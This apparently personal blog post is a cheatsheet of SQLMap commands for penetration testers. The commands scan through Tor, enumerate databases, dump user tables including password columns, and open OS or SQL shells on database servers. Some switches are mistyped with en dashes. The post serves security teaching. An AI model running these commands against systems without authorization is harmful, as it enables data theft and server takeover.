SQLMap Cheatsheet

I thought it might be fun to add another cheatsheet to the collection, this time for the tool SQLMap.

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.



Easy Scanning option:

sqlmap -u ""

Scanning by using tor:

sqlmap -u "" --tor --tor-type=SOCKS5

Scanning by manually setting the return time:

sqlmap -u "" --time-sec 15

List all databases at the site:

sqlmap -u "" --dbs

List all tables in a specific database:

sqlmap -u "" -D site_db --tables

Dump the contents of a DB table:

sqlmap -u "" -D site_db -T users –dump

List all columns in a table:

sqlmap -u "" -D site_db -T users --columns

Dump only selected columns:

sqlmap -u "" -D site_db -T users -C username,password --dump

Dump a table from a database when you have admin credentials:

sqlmap -u "" –method "POST" –data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users –dump

Get OS Shell:

sqlmap --dbms=mysql -u "" --os-shell

Get SQL Shell:

sqlmap --dbms=mysql -u "" --sql-shell

This is purely quick and dirty commands you can run for SQLMap. I would highly recommend as a glowing pentester to read the ultimate manual for SQLMap which can be found here.

I don’t have any sponsors or anything but if you enjoy my work, or feel sympathy for my wife, then I have set up a Ko-Fi account as well as a BuyMeACoffee people can donate to.